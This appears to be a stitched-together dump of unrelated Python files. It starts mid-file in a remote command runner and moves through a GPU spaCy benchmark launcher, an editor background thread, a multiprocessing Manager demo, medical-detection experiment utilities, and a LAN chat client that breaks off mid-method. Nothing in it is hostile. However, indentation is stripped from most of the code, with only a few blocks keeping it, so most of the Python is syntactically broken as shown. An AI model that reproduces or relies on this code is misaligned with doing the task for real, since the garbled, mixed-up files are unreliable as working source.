self.ipaddress = machine.ip_address
self.run_command()
except:
errorType, value, traceback = sys.exc_info()
self.print("### Unexpected Exception: " + str(errorType) + ": " + str(value) + "\n" + str(traceback))
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO, format="%(message)s")
import argparse
arg_parser = argparse.ArgumentParser("remoterunner executes remote commands on a given machine")
arg_parser.add_argument("--ipaddress", help="Address of machine to run commands on", required=True)
arg_parser.add_argument("--username", help="Username for logon to remote machine", default=None)
arg_parser.add_argument("--password", help="Password for logon to remote machine", default=None)
arg_parser.add_argument("--command", help="The command to run on the remote machine", default=None)
arg_parser.add_argument("--logfile", help="The name of logfile to write to", default=None)
arg_parser.add_argument("--timeout", type=bool, help="Timeout for the command in seconds (default 300 seconds)",
default=300)
args = arg_parser.parse_args()
with RemoteRunner(ipaddress=args.ipaddress, username=args.username, password=args.password,
command=args.command, verbose=True, logfile=args.logfile, timeout=args.timeout) as runner:
runner.run_command()
|
main_test_gpu.py
|
from multiprocessing import Process
import wikipedia
import spacy
import time
import sys
import os
#By Anton Rakos
#If the user has declared that a given node has a
#GPU with the appropriate drivers and toolkits installed, they may run a test bench using the spaCy NLP toolkit.
spacy.prefer_gpu()
nlp = spacy.load('en_core_web_sm')
wikipedia.set_lang("en")
rando = str(wikipedia.random(pages=1))
page = wikipedia.page(rando)
def func0():
time_1 = time.time()
os.system('python3 data_0.py')
time_1 = time.time() - time_1
print("GPU:: It took ", time_1, " seconds. data_0 ")
print("------------------------------")
def func1():
time_1 = time.time()
os.system('python3 data_1.py')
time_1 = time.time() - time_1
print("GPU:: It took ", time_1, " seconds. data_1 ")
print("------------------------------")
def func2():
    time_1 = time.time()
    os.system('python3 data_2.py')
    time_1 = time.time() - time_1
    print("GPU:: It took ", time_1, " seconds. data_2 ")
    print("------------------------------")
def func3():
time_1 = time.time()
os.system('python3 data_3.py')
time_1 = time.time() - time_1
print("GPU:: It took ", time_1, " seconds. data_3 ")
print("------------------------------")
def func4():
time_1 = time.time()
os.system('python3 data_4.py')
time_1 = time.time() - time_1
print("GPU:: It took ", time_1, " seconds. data_4 ")
print("------------------------------")
def func5():
time_1 = time.time()
os.system('python3 data_5.py')
time_1 = time.time() - time_1
print("GPU:: It took ", time_1, " seconds. data_5 ")
print("------------------------------")
def func6():
time_1 = time.time()
os.system('python3 data_6.py')
time_1 = time.time() - time_1
print("GPU:: It took ", time_1, " seconds. data_6 ")
print("------------------------------")
def func7():
time_1 = time.time()
os.system('python3 data_7.py')
time_1 = time.time() - time_1
print("GPU:: It took ", time_1, " seconds. data_7 ")
print("------------------------------")
if __name__=='__main__':
p0 = Process(target = func0)
p0.start()
p1 = Process(target = func1)
p1.start()
p2 = Process(target = func2)
p2.start()
p3 = Process(target = func3)
p3.start()
p4 = Process(target = func4)
p4.start()
p5 = Process(target = func5)
p5.start()
p6 = Process(target = func6)
p6.start()
#p7 = Process(target = func7)
#p7.start()
|
background.py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# For Python 2to3 support.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
try:
import Queue as queue
except ImportError:
import queue
import signal
import sys
import threading
import time
import traceback
import app.profile
import app.render
class BackgroundThread(threading.Thread):
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.toBackground = None
self.fromBackground = None
def get(self):
return self.fromBackground.get()
def hasMessage(self):
# This thread yield (time.sleep(0)) dramatically improves Python3
# performance. Without this line empty() will be called far too often.
time.sleep(0)
return not self.fromBackground.empty()
def hasUserEvent(self):
time.sleep(0) # See note in hasMessage().
return not self.toBackground.empty()
def put(self, data):
self.toBackground.put(data)
def background(inputQueue, outputQueue):
cmdCount = 0
block = True
pid = os.getpid()
signalNumber = signal.SIGUSR1
while True:
try:
try:
program, message = inputQueue.get(block)
#profile = app.profile.beginPythonProfile()
if message == 'quit':
app.log.info('bg received quit message')
return
program.executeCommandList(message)
program.shortTimeSlice()
program.render()
# debugging only: program.showWindowHierarchy()
cmdCount += len(message)
outputQueue.put(program.program.frame.grabFrame() + (cmdCount,))
os.kill(pid, signalNumber)
#app.profile.endPythonProfile(profile)
time.sleep(0) # See note in hasMessage().
if not inputQueue.empty():
continue
except queue.Empty:
pass
block = program.longTimeSlice()
if block:
program.render()
outputQueue.put(program.program.frame.grabFrame() + (cmdCount,))
os.kill(pid, signalNumber)
except Exception as e:
app.log.exception(e)
app.log.error('bg thread exception', e)
errorType, value, tracebackInfo = sys.exc_info()
out = traceback.format_exception(errorType, value, tracebackInfo)
outputQueue.put(('exception', out))
os.kill(pid, signalNumber)
while True:
program, message = inputQueue.get()
if message == 'quit':
app.log.info('bg received quit message')
return
def startupBackground():
toBackground = queue.Queue()
fromBackground = queue.Queue()
bg = BackgroundThread(
target=background, args=(toBackground, fromBackground))
bg.setName('ci_edit_bg')
bg.setDaemon(True)
bg.start()
bg.toBackground = toBackground
bg.fromBackground = fromBackground
return bg
|
manager.py
|
from cloudbutton.multiprocessing import Process, Manager
def f(d, l):
d[1] = '1'
d['2'] = 2
d[0.25] = None
l.reverse()
if __name__ == '__main__':
with Manager() as manager:
d = manager.dict()
l = manager.list(range(10))
p = Process(target=f, args=(d, l))
p.start()
p.join()
print(d.todict())
print(l.tolist())
|
exp_utils.py
|
#!/usr/bin/env python
# Copyright 2018 Division of Medical Image Computing, German Cancer Research Center (DKFZ).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from typing import Iterable, Tuple, Any, Union
import os, sys
import subprocess
from multiprocessing import Process
import importlib.util
import pickle
import logging
from torch.utils.tensorboard import SummaryWriter
from collections import OrderedDict
import numpy as np
import torch
import pandas as pd
def split_off_process(target, *args, daemon: bool=False, **kwargs):
"""Start a process that won't block parent script.
No join(), no return value. If daemon=False: before parent exits, it waits for this to finish.
:param target: the target function of the process.
:params *args: args to pass to target.
:param daemon: if False: before parent exits, it waits for this process to finish.
:params **kwargs: kwargs to pass to target.
"""
p = Process(target=target, args=tuple(args), kwargs=kwargs, daemon=daemon)
p.start()
return p
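# Hypothetical usage (function name and argument are placeholders): detach a
# worker without blocking the caller.
#   p = split_off_process(some_io_heavy_function, "/tmp/out.pkl", daemon=True)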
def get_formatted_duration(seconds: float, format: str="hms") -> str:
"""Format a time in seconds.
:param format: "hms" for hours mins secs or "ms" for min secs.
"""
mins, secs = divmod(seconds, 60)
if format == "ms":
t = "{:d}m:{:02d}s".format(int(mins), int(secs))
elif format == "hms":
h, mins = divmod(mins, 60)
t = "{:d}h:{:02d}m:{:02d}s".format(int(h), int(mins), int(secs))
else:
raise Exception("Format {} not available, only 'hms' or 'ms'".format(format))
return t
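# Worked examples for the formatter above:
#   get_formatted_duration(3750)               -> '1h:02m:30s'
#   get_formatted_duration(3750, format="ms")  -> '62m:30s'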
class CombinedLogger(object):
"""Combine console and tensorboard logger and record system metrics.
"""
def __init__(self, name: str, log_dir: str, server_env: bool=True, fold: Union[int, str]="all"):
self.pylogger = logging.getLogger(name)
self.tboard = SummaryWriter(log_dir=os.path.join(log_dir, "tboard"))
self.log_dir = log_dir
self.fold = str(fold)
self.server_env = server_env
self.pylogger.setLevel(logging.DEBUG)
self.log_file = os.path.join(log_dir, "fold_"+self.fold, 'exec.log')
os.makedirs(os.path.dirname(self.log_file), exist_ok=True)
self.pylogger.addHandler(logging.FileHandler(self.log_file))
if not server_env:
self.pylogger.addHandler(ColorHandler())
else:
self.pylogger.addHandler(logging.StreamHandler())
self.pylogger.propagate = False
def __getattr__(self, attr):
"""delegate all undefined method requests to objects of
this class in order pylogger, tboard (first find first serve).
E.g., combinedlogger.add_scalars(...) should trigger self.tboard.add_scalars(...)
"""
for obj in [self.pylogger, self.tboard]:
if attr in dir(obj):
return getattr(obj, attr)
print("logger attr not found")
def set_logfile(self, fold: Union[int, str, None]=None, log_file: Union[str, None]=None):
if fold is not None:
self.fold = str(fold)
if log_file is None:
self.log_file = os.path.join(self.log_dir, "fold_"+self.fold, 'exec.log')
else:
self.log_file = log_file
os.makedirs(os.path.dirname(self.log_file), exist_ok=True)
for hdlr in self.pylogger.handlers:
hdlr.close()
self.pylogger.handlers = []
self.pylogger.addHandler(logging.FileHandler(self.log_file))
if not self.server_env:
self.pylogger.addHandler(ColorHandler())
else:
self.pylogger.addHandler(logging.StreamHandler())
def metrics2tboard(self, metrics, global_step=None, suptitle=None):
"""
:param metrics: {'train': dataframe, 'val':df}, df as produced in
evaluator.py.evaluate_predictions
"""
# print("metrics", metrics)
if global_step is None:
global_step = len(metrics['train'][list(metrics['train'].keys())[0]]) - 1
if suptitle is not None:
suptitle = str(suptitle)
else:
suptitle = "Fold_" + str(self.fold)
for key in ['train', 'val']:
# series = {k:np.array(v[-1]) for (k,v) in metrics[key].items() if not np.isnan(v[-1]) and not 'Bin_Stats' in k}
loss_series = {}
mon_met_series = {}
for tag, val in metrics[key].items():
val = val[-1] # maybe remove list wrapping, recording in evaluator?
if 'loss' in tag.lower() and not np.isnan(val):
loss_series["{}".format(tag)] = val
elif not np.isnan(val):
mon_met_series["{}".format(tag)] = val
self.tboard.add_scalars(suptitle + "/Losses/{}".format(key), loss_series, global_step)
self.tboard.add_scalars(suptitle + "/Monitor_Metrics/{}".format(key), mon_met_series, global_step)
self.tboard.add_scalars(suptitle + "/Learning_Rate", metrics["lr"], global_step)
return
def __del__(self): # otherwise might produce multiple prints e.g. in ipython console
for hdlr in self.pylogger.handlers:
hdlr.close()
self.pylogger.handlers = []
del self.pylogger
self.tboard.flush()
# close somehow prevents main script from exiting
# maybe revise this issue in a later pytorch version
#self.tboard.close()
def get_logger(exp_dir: str, server_env: bool=False) -> CombinedLogger:
"""
    Creates a logger instance that writes info to a file, to the terminal, and to tensorboard.
:param exp_dir: experiment directory, where exec.log file is stored.
:param server_env: True if operating in server environment (e.g., gpu cluster)
:return: custom CombinedLogger instance.
"""
log_dir = os.path.join(exp_dir, "logs")
logger = CombinedLogger('medicaldetectiontoolkit', log_dir, server_env=server_env)
print("Logging to {}".format(logger.log_file))
return logger
def prep_exp(dataset_path, exp_path, server_env, use_stored_settings=True, is_training=True):
"""
    Handles I/O and creates the experiment folder structure. Also creates a snapshot of the configs/model scripts and copies them to the exp_dir.
    This way the exp_dir contains all info needed to conduct the experiment, independent of later changes to the actual source code, so training/inference for this experiment can be started at any time. For that purpose, the model script is copied back to the source code dir as tmp_model (tmp_backbone).
    Provides a robust structure for cloud deployment.
:param dataset_path: path to source code for specific data set. (e.g. medicaldetectiontoolkit/lidc_exp)
:param exp_path: path to experiment directory.
:param server_env: boolean flag. pass to configs script for cloud deployment.
:param use_stored_settings: boolean flag. When starting training: If True, starts training from snapshot in existing experiment directory, else creates experiment directory on the fly using configs/model scripts from source code.
:param is_training: boolean flag. distinguishes train vs. inference mode.
:return:
"""
if is_training:
if use_stored_settings:
cf_file = import_module('cf_file', os.path.join(exp_path, 'configs.py'))
cf = cf_file.configs(server_env)
# in this mode, previously saved model and backbone need to be found in exp dir.
if not os.path.isfile(os.path.join(exp_path, 'model.py')) or \
not os.path.isfile(os.path.join(exp_path, 'backbone.py')):
raise Exception(
"Selected use_stored_settings option but no model and/or backbone source files exist in exp dir.")
cf.model_path = os.path.join(exp_path, 'model.py')
cf.backbone_path = os.path.join(exp_path, 'backbone.py')
else:
# this case overwrites settings files in exp dir, i.e., default_configs, configs, backbone, model
os.makedirs(exp_path, exist_ok=True)
# run training with source code info and copy snapshot of model to exp_dir for later testing (overwrite scripts if exp_dir already exists.)
subprocess.call('cp {} {}'.format('default_configs.py', os.path.join(exp_path, 'default_configs.py')),
shell=True)
subprocess.call(
'cp {} {}'.format(os.path.join(dataset_path, 'configs.py'), os.path.join(exp_path, 'configs.py')),
shell=True)
cf_file = import_module('cf_file', os.path.join(dataset_path, 'configs.py'))
cf = cf_file.configs(server_env)
subprocess.call('cp {} {}'.format(cf.model_path, os.path.join(exp_path, 'model.py')), shell=True)
subprocess.call('cp {} {}'.format(cf.backbone_path, os.path.join(exp_path, 'backbone.py')), shell=True)
if os.path.isfile(os.path.join(exp_path, "folds_ids.pickle")):
subprocess.call('rm {}'.format(os.path.join(exp_path, "folds_ids.pickle")), shell=True)
else:
# testing, use model and backbone stored in exp dir.
cf_file = import_module('cf_file', os.path.join(exp_path, 'configs.py'))
cf = cf_file.configs(server_env)
cf.model_path = os.path.join(exp_path, 'model.py')
cf.backbone_path = os.path.join(exp_path, 'backbone.py')
cf.exp_dir = exp_path
cf.test_dir = os.path.join(cf.exp_dir, 'test')
cf.plot_dir = os.path.join(cf.exp_dir, 'plots')
if not os.path.exists(cf.test_dir):
os.mkdir(cf.test_dir)
if not os.path.exists(cf.plot_dir):
os.mkdir(cf.plot_dir)
cf.experiment_name = exp_path.split("/")[-1]
cf.created_fold_id_pickle = False
return cf
def import_module(name: str, path: str):
"""
correct way of importing a module dynamically in python 3.
:param name: name given to module instance.
:param path: path to module.
:return: module: returned module instance.
"""
spec = importlib.util.spec_from_file_location(name, path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
return module
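# Hedged usage sketch (added for illustration, not part of the original module): write a tiny
# throwaway module to a temporary file and load it dynamically via import_module(). The module
# contents are invented for the demonstration.
def _example_import_module():
    import tempfile
    with tempfile.NamedTemporaryFile("w", suffix=".py", delete=False) as tmp:
        tmp.write("ANSWER = 42\n")
    demo = import_module("demo_module", tmp.name)
    return demo.ANSWER  # -> 42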
def set_params_flag(module: torch.nn.Module, flag: Tuple[str, Any], check_overwrite: bool = True) -> torch.nn.Module:
"""Set an attribute for all passed module parameters.
:param flag: tuple (str attribute name : attr value)
:param check_overwrite: if True, assert that attribute not already exists.
"""
for param in module.parameters():
if check_overwrite:
assert not hasattr(param, flag[0]), \
"param {} already has attr {} (w/ val {})".format(param, flag[0], getattr(param, flag[0]))
setattr(param, flag[0], flag[1])
return module
def parse_params_for_optim(net: torch.nn.Module, weight_decay: float = 0., exclude_from_wd: Iterable = ("norm",)) -> list:
"""Split network parameters into weight-decay dependent groups for the optimizer.
:param net: network.
:param weight_decay: weight decay value for the parameters that it is applied to. excluded parameters will have
weight decay 0.
:param exclude_from_wd: List of strings of parameter-group names to exclude from weight decay. Options: "norm", "bias".
:return:
"""
if weight_decay is None:
weight_decay = 0.
# pytorch implements parameter groups as dicts {'params': ...} and
# weight decay as p.data.mul_(1 - group['lr'] * group['weight_decay'])
norm_types = [torch.nn.BatchNorm1d, torch.nn.BatchNorm2d, torch.nn.BatchNorm3d,
torch.nn.InstanceNorm1d, torch.nn.InstanceNorm2d, torch.nn.InstanceNorm3d,
torch.nn.LayerNorm, torch.nn.GroupNorm, torch.nn.SyncBatchNorm, torch.nn.LocalResponseNorm]
level_map = {"bias": "weight",
"norm": "module"}
type_map = {"norm": norm_types}
exclude_from_wd = [str(name).lower() for name in exclude_from_wd]
exclude_weight_names = [k for k, v in level_map.items() if k in exclude_from_wd and v == "weight"]
exclude_module_types = tuple([type_ for k, v in level_map.items() if (k in exclude_from_wd and v == "module")
for type_ in type_map[k]])
if exclude_from_wd:
print("excluding {} from weight decay.".format(exclude_from_wd))
for module in net.modules():
if isinstance(module, exclude_module_types):
set_params_flag(module, ("no_wd", True))
for param_name, param in net.named_parameters():
if np.any([ename in param_name for ename in exclude_weight_names]):
setattr(param, "no_wd", True)
with_dec, no_dec = [], []
for param in net.parameters():
if hasattr(param, "no_wd") and param.no_wd == True:
no_dec.append(param)
else:
with_dec.append(param)
orig_ps = sum(p.numel() for p in net.parameters())
with_ps = sum(p.numel() for p in with_dec)
wo_ps = sum(p.numel() for p in no_dec)
    assert orig_ps == with_ps + wo_ps, "total n parameters {} does not equal sum of params with wd {} and without wd {}."\
        .format(orig_ps, with_ps, wo_ps)
groups = [{'params': gr, 'weight_decay': wd} for (gr, wd) in [(no_dec, 0.), (with_dec, weight_decay)] if len(gr)>0]
return groups
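# Hedged usage sketch (added for illustration, not part of the original module): build the two
# weight-decay parameter groups for a small throwaway network and hand them to an optimizer.
# The layer sizes and hyperparameters are assumptions.
def _example_parse_params_for_optim():
    import torch
    net = torch.nn.Sequential(torch.nn.Conv2d(1, 8, 3), torch.nn.BatchNorm2d(8))
    groups = parse_params_for_optim(net, weight_decay=1e-5, exclude_from_wd=("norm", "bias"))
    # norm and bias parameters end up in the group with weight_decay=0.
    return torch.optim.AdamW(groups, lr=1e-4)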
class ModelSelector:
'''
    saves a checkpoint after each epoch as 'last_checkpoint' (can be loaded to continue interrupted training).
saves the top-k (k=cf.save_n_models) ranked epochs. In inference, predictions of multiple epochs can be ensembled to improve performance.
'''
def __init__(self, cf, logger):
self.cf = cf
self.saved_epochs = [-1] * cf.save_n_models
self.logger = logger
def run_model_selection(self, net: torch.nn.Module, optimizer: torch.optim.Optimizer,
monitor_metrics: dict, epoch: int):
# take the mean over all selection criteria in each epoch
non_nan_scores = np.mean(np.array([[0 if (ii is None or np.isnan(ii)) else ii for ii in monitor_metrics['val'][sc]] for sc in self.cf.model_selection_criteria]), 0)
epochs_scores = [ii for ii in non_nan_scores[1:]]
# ranking of epochs according to model_selection_criterion
epoch_ranking = np.argsort(epochs_scores, kind="stable")[::-1] + 1 #epochs start at 1
# if set in configs, epochs < min_save_thresh are discarded from saving process.
epoch_ranking = epoch_ranking[epoch_ranking >= self.cf.min_save_thresh]
# check if current epoch is among the top-k epochs.
if epoch in epoch_ranking[:self.cf.save_n_models]:
save_dir = os.path.join(self.cf.fold_dir, '{}_best_checkpoint'.format(epoch))
if not os.path.exists(save_dir):
os.mkdir(save_dir)
torch.save(net.state_dict(), os.path.join(save_dir, 'params.pth'))
with open(os.path.join(save_dir, 'monitor_metrics.pickle'), 'wb') as handle:
pickle.dump(monitor_metrics, handle)
# save epoch_ranking to keep info for inference.
np.save(os.path.join(self.cf.fold_dir, 'epoch_ranking'), epoch_ranking[:self.cf.save_n_models])
np.save(os.path.join(save_dir, 'epoch_ranking'), epoch_ranking[:self.cf.save_n_models])
self.logger.info(
"saving current epoch {} at rank {}".format(epoch, np.argwhere(epoch_ranking == epoch)))
# delete params of the epoch that just fell out of the top-k epochs.
for se in [int(ii.split('_')[0]) for ii in os.listdir(self.cf.fold_dir) if 'best_checkpoint' in ii]:
if se in epoch_ranking[self.cf.save_n_models:]:
subprocess.call('rm -rf {}'.format(os.path.join(self.cf.fold_dir, '{}_best_checkpoint'.format(se))), shell=True)
self.logger.info('deleting epoch {} at rank {}'.format(se, np.argwhere(epoch_ranking == se)))
state = {
'epoch': epoch,
'state_dict': net.state_dict(),
'optimizer': optimizer.state_dict(),
}
# save checkpoint of current epoch.
        save_dir = os.path.join(self.cf.fold_dir, 'last_checkpoint')
if not os.path.exists(save_dir):
os.mkdir(save_dir)
torch.save(state, os.path.join(save_dir, 'params.pth'))
np.save(os.path.join(save_dir, 'epoch_ranking'), epoch_ranking[:self.cf.save_n_models])
with open(os.path.join(save_dir, 'monitor_metrics.pickle'), 'wb') as handle:
pickle.dump(monitor_metrics, handle)
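# Hedged usage sketch (added for illustration, not part of the original module): the selector is
# created once per fold and queried after every epoch; cf, logger, net, optimizer and
# monitor_metrics are assumed to come from the surrounding training loop.
def _example_model_selection_loop(cf, logger, net, optimizer, monitor_metrics, num_epochs=2):
    model_selector = ModelSelector(cf, logger)
    for epoch in range(1, num_epochs + 1):
        # ... train one epoch and append evaluation results to monitor_metrics here ...
        model_selector.run_model_selection(net, optimizer, monitor_metrics, epoch)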
def load_checkpoint(checkpoint_path: str, net: torch.nn.Module, optimizer: torch.optim.Optimizer) -> Tuple:
checkpoint = torch.load(os.path.join(checkpoint_path, 'params.pth'))
net.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
with open(os.path.join(checkpoint_path, 'monitor_metrics.pickle'), 'rb') as handle:
monitor_metrics = pickle.load(handle)
starting_epoch = checkpoint['epoch'] + 1
return starting_epoch, net, optimizer, monitor_metrics
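# Hedged usage sketch (added for illustration, not part of the original module): resume an
# interrupted run from the 'last_checkpoint' directory that ModelSelector writes after every
# epoch; cf, net and optimizer are assumed to be set up exactly as in the original run.
def _example_resume_training(cf, net, optimizer):
    checkpoint_path = os.path.join(cf.fold_dir, 'last_checkpoint')
    starting_epoch, net, optimizer, monitor_metrics = load_checkpoint(checkpoint_path, net, optimizer)
    return starting_epoch, net, optimizer, monitor_metrics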
def prepare_monitoring(cf):
"""
creates dictionaries, where train/val metrics are stored.
"""
metrics = {}
# first entry for loss dict accounts for epoch starting at 1.
metrics['train'] = OrderedDict()
metrics['val'] = OrderedDict()
metric_classes = []
if 'rois' in cf.report_score_level:
metric_classes.extend([v for k, v in cf.class_dict.items()])
if 'patient' in cf.report_score_level:
metric_classes.extend(['patient'])
for cl in metric_classes:
metrics['train'][cl + '_ap'] = [np.nan]
metrics['val'][cl + '_ap'] = [np.nan]
if cl == 'patient':
metrics['train'][cl + '_auc'] = [np.nan]
metrics['val'][cl + '_auc'] = [np.nan]
return metrics
def create_csv_output(results_list, cf, logger):
"""
Write out test set predictions to .csv file. output format is one line per prediction:
PatientID | PredictionID | [y1 x1 y2 x2 (z1) (z2)] | score | pred_classID
    Note that prediction coordinates correspond to images as loaded for training/testing and need to be adapted when
plotted over raw data (before preprocessing/resampling).
:param results_list: [[patient_results, patient_id], [patient_results, patient_id], ...]
"""
logger.info('creating csv output file at {}'.format(os.path.join(cf.test_dir, 'results.csv')))
predictions_df = pd.DataFrame(columns = ['patientID', 'predictionID', 'coords', 'score', 'pred_classID'])
for r in results_list:
pid = r[1]
#optionally load resampling info from preprocessing to match output predictions with raw data.
#with open(os.path.join(cf.exp_dir, 'test_resampling_info', pid), 'rb') as handle:
# resampling_info = pickle.load(handle)
for bix, box in enumerate(r[0][0]):
if box["box_type"] == "gt":
continue
assert box['box_type'] == 'det', box['box_type']
coords = box['box_coords']
score = box['box_score']
pred_class_id = box['box_pred_class_id']
out_coords = []
if score >= cf.min_det_thresh:
out_coords.append(coords[0]) #* resampling_info['scale'][0])
out_coords.append(coords[1]) #* resampling_info['scale'][1])
out_coords.append(coords[2]) #* resampling_info['scale'][0])
out_coords.append(coords[3]) #* resampling_info['scale'][1])
if len(coords) > 4:
out_coords.append(coords[4]) #* resampling_info['scale'][2] + resampling_info['z_crop'])
out_coords.append(coords[5]) #* resampling_info['scale'][2] + resampling_info['z_crop'])
predictions_df.loc[len(predictions_df)] = [pid, bix, out_coords, score, pred_class_id]
try:
fold = cf.fold
    except AttributeError:
fold = 'hold_out'
predictions_df.to_csv(os.path.join(cf.exp_dir, 'results_{}.csv'.format(fold)), index=False)
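# Hedged usage sketch (added for illustration, not part of the original module): write a single
# made-up detection for one patient in the nested results_list format documented above. The box
# coordinates, score and class id are invented for the demonstration.
def _example_csv_output(cf, logger):
    fake_box = {'box_type': 'det', 'box_coords': [10, 12, 40, 44], 'box_score': 0.9,
                'box_pred_class_id': 1}
    results_list = [[[[fake_box]], 'patient_0']]
    create_csv_output(results_list, cf, logger)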
class _AnsiColorizer(object):
"""
A colorizer is an object that loosely wraps around a stream, allowing
callers to write text to the stream in a particular color.
Colorizer classes must implement C{supported()} and C{write(text, color)}.
"""
_colors = dict(black=30, red=31, green=32, yellow=33,
blue=34, magenta=35, cyan=36, white=37, default=39)
def __init__(self, stream):
self.stream = stream
@classmethod
def supported(cls, stream=sys.stdout):
"""
A class method that returns True if the current platform supports
coloring terminal output using this method. Returns False otherwise.
"""
if not stream.isatty():
return False # auto color only on TTYs
try:
import curses
except ImportError:
return False
else:
try:
try:
return curses.tigetnum("colors") > 2
except curses.error:
curses.setupterm()
return curses.tigetnum("colors") > 2
            except Exception:
                # guess false in case of error
                return False
def write(self, text, color):
"""
Write the given text to the stream in the given color.
@param text: Text to be written to the stream.
@param color: A string label for a color. e.g. 'red', 'white'.
"""
color = self._colors[color]
self.stream.write('\x1b[%sm%s\x1b[0m' % (color, text))
class ColorHandler(logging.StreamHandler):
def __init__(self, stream=sys.stdout):
super(ColorHandler, self).__init__(_AnsiColorizer(stream))
def emit(self, record):
msg_colors = {
logging.DEBUG: "green",
logging.INFO: "default",
logging.WARNING: "red",
logging.ERROR: "red"
}
color = msg_colors.get(record.levelno, "blue")
        self.stream.write(record.getMessage() + "\n", color)
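if __name__ == "__main__":
    # Hedged usage sketch (added for illustration, not part of the original module): attach the
    # ColorHandler to a throwaway logger and emit one message per level to see the coloring.
    demo_logger = logging.getLogger("color_handler_demo")
    demo_logger.setLevel(logging.DEBUG)
    demo_logger.addHandler(ColorHandler())
    demo_logger.debug("debug messages are green")
    demo_logger.info("info messages use the default color")
    demo_logger.warning("warnings are red")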
|
client.py
|
# -*- coding: utf-8 -*-
# author: inspurer(月小水长)
# pc_type lenovo
# create_date: 2018/12/15
# file_name: client.py
# description: 月小水长 ("the passion has not yet cooled")
from socket import *
from threading import Thread
import wx
import os
from tkinter import filedialog
import tkinter
import json
import wx.lib.agw.customtreectrl as CT
root = tkinter.Tk()
root.withdraw()  # hide the tkinter root window
serverPort = 6789
serverIp = "10.10.21.222"
class QICQ(wx.Frame):
def __init__(self):
global serverIp,serverPort
wx.Frame.__init__(self,parent=None,title="SocketQICQ",size=(600,400))
panel=wx.Panel(self)
self.isChoosedFile = False
self.dataOfChoosedFile = None
self.fileName = None
panel.SetBackgroundColour((0, 153, 255))
        # in python 3.5.1 the style flags have no effect on wx.TreeCtrl(), so CustomTreeCtrl is used instead
self.userListTree = CT.CustomTreeCtrl(parent=panel,pos=(10,10),size=(280,300),
style=wx.TR_FULL_ROW_HIGHLIGHT)
self.rootID = self.userListTree.AddRoot("已登录用户")
self.userListTree.SetBackgroundColour((224,255,255))
self.userListTree.AppendItem(self.rootID,"第一个子节点")
self.userListTree.AppendItem(self.rootID,"第二个子节点")
self.userListTree.ExpandAll()
self.userList = []
self.info = wx.Button(parent=panel,pos=(100,315),size=(80,40),label="说明")
self.info.SetBackgroundColour((224,255,255))
inputTip = wx.TextCtrl(parent=panel,pos=(300,10),size=(130,20),value="请输入你要发送的信息",
style=wx.TE_READONLY)
inputTip.SetForegroundColour((0,153,255))
inputTip.SetBackgroundColour((224,255,255))
self.input = wx.TextCtrl(parent=panel,pos=(300,30),size=(130,50))
self.input.SetForegroundColour((0,153,255))
self.input.SetBackgroundColour((224,255,255))
self.fileChooser = wx.Button(parent=panel,pos=(440,10),size=(130,70),label="选择文件")
self.fileChooser.SetBackgroundColour((224,255,255))
self.send = wx.Button(parent=panel,pos=(300,100),size=(275,50),label="发送")
self.send.SetBackgroundColour((224,255,255))
separation = wx.TextCtrl(parent=panel,pos=(290,170),size=(300,2))
separation.SetBackgroundColour((224, 255, 255))
receivedTip = wx.TextCtrl(parent=panel,pos=(300,190),size=(135,20),value="发送/接收到的消息列表",
style=wx.TE_READONLY)
receivedTip.SetForegroundColour((0,153,255))
receivedTip.SetBackgroundColour((224,255,255))
self.messageList = wx.TextCtrl(parent=panel,size=(275,120),pos=(300,210),
style=(wx.TE_MULTILINE|wx.HSCROLL|wx.TE_READONLY))
self.messageList.SetBackgroundColour((224, 255, 255))
        # foreground color, i.e. the font color
self.messageList.SetForegroundColour((0, 153, 255))
self.sendMessage = ""
        childThread = Thread(target=self.socketHander)
        childThread.setDaemon(True)
        childThread.start()
self.Bind(wx.EVT_BUTTON,self.OnInfoClicked,self.info)
self.Bind(wx.EVT_BUTTON,self.OnSendClicked,self.send)
self.Bind(wx.EVT_BUTTON,self.onFileChooseClicked,self.fileChooser)
def OnInfoClicked(self,event):
wx.MessageDialog(self, u'''\r\n\r\n\r\n\t\t1、互联的环境必须是在同一个局域网\r\n
2、必须先在左边选择发送对象且发送消息不为空才能发送消息\r\n
3、选择根目录{已登录用户}是群发消息,选择单个是私发消息\r\n
4、刚登录时最后一个ip是你自己的ip\r\n''', u"警告", wx.OK).ShowModal()
def OnSendClicked(self,event):
self.sendMessage = self.input.Value
#print(self.sendMessage)
if len(self.sendMessage) == 0 and self.isChoosedFile == False:
wx.MessageDialog(self, u"请先输入(选择)待发送的消息(文件)", u"警告", wx.OK).ShowModal()
return None
selected = self.userListTree.GetSelection()
selected = self.userListTree.GetItemText(selected)
#print(selected)
if not selected:
wx.MessageDialog(self, u"请先选择用户或组", u"警告", wx.OK).ShowModal()
return None
        # the root node is selected, so the message is broadcast to all users
if selected == "已登录用户":
if self.isChoosedFile == False:
self.sendMessage = {
"type":"2",
"sourceIP":self.ip,
"destinationIP":selected,
"content":self.sendMessage
}
else:
self.sendMessage = {
"type":"5",
"sourceIP":self.ip,
"destinationIP":selected,
"filename":self.fileName,
"content":self.dataOfChoosedFile
}
else:
if self.isChoosedFile == False:
self.sendMessage = {
"type":"1",
"sourceIP":self.ip,
"destinationIP":selected,
"content":self.sendMessage
}
else:
self.sendMessage = {
"type": "4",
"sourceIP": self.ip,
"destinationIP": selected,
"filename": self.fileName,
"content": self.dataOfChoosedFile
}
def onFileChooseClicked(self,event):
filepath = filedialog.askopenfilename(title="请选择要发送的文件")
if len(filepath)>0:
filedicpath, fullflname = os.path.split(filepath)
self.fileName = fullflname
self.isChoosedFile = True
